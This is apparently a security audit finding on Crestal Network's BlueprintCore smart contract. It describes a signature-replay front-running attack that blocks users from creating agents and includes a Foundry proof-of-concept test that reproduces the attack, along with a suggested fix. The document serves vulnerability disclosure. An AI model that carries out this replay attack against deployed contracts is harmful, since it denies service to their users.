Refined Ash Crane

Medium

# Attacker will block agent creation for user

### Summary

Signature reuse will cause a denial of service for agent creation as attacker can frontrun user's transaction to create a project with the same ID, making it impossible to create an agent.

### Root Cause

In [createAgentWithTokenWithSig()](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L505) the signature is used to verify the signer but the same signature can be reused by an attacker to call [createProjectIDAndDeploymentRequestWithSig()](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L410) first, creating a project with the same ID.

### Internal Pre-conditions

None

### External Pre-conditions

None

### Attack Path

1. User signs message to create agent with token
2. Attacker frontrunning user's transaction by calling `createProjectIDAndDeploymentRequestWithSig()` with same signature
3. User's transaction to `createAgentWithTokenWithSig()` reverts since project ID already exists

### Impact

The user is unable to create an agent

### PoC

```solidty
function test_Poc_dosCreateAgent() public {
    uint256 victimPrivateKey = 0xDEADBEEF;
    address victim = vm.addr(victimPrivateKey);
    address attacker = makeAddr("attacker");

    string memory base64Proposal = "test base64 proposal";
    string memory serverURL = "http://example.com";

    uint256 validTokenAmount = 100 * 10 ** 18;

    // Mint tokens to the victim account
    mockToken.mint(victim, validTokenAmount);
    // Add the payment address
    blueprint.addPaymentAddress(address(mockToken));
    // Set non-zero cost for creating agents, use any number greater than 0
    blueprint.setCreateAgentTokenCost(address(mockToken), validTokenAmount);

    // Generate the signature
    bytes32 digest = blueprint.getRequestDeploymentDigest(projectId, base64Proposal, serverURL);
    (uint8 v, bytes32 r, bytes32 s) = vm.sign(victimPrivateKey, digest);

    bytes memory signature = abi.encodePacked(r, s, v);
    
    // Victim calls createAgentWithTokenWithSig, but the attacker detects transaction in mempool
    // and front-runs it by calling createProjectIDAndDeploymentRequestWithSig
    vm.prank(attacker); 
    blueprint.createProjectIDAndDeploymentRequestWithSig(projectId, base64Proposal, serverURL, signature);
    
    vm.startPrank(victim);
    // Approve the blueprint contract to spend tokens directly from the victim account
    mockToken.approve(address(blueprint), validTokenAmount);
    vm.expectRevert("projectId already exists");
    blueprint.createAgentWithTokenWithSig(projectId, base64Proposal, workerAddress, serverURL, address(mockToken), signature);
}
```

### Mitigation

Consider possibly adding a check that msg.sender and signer are the same address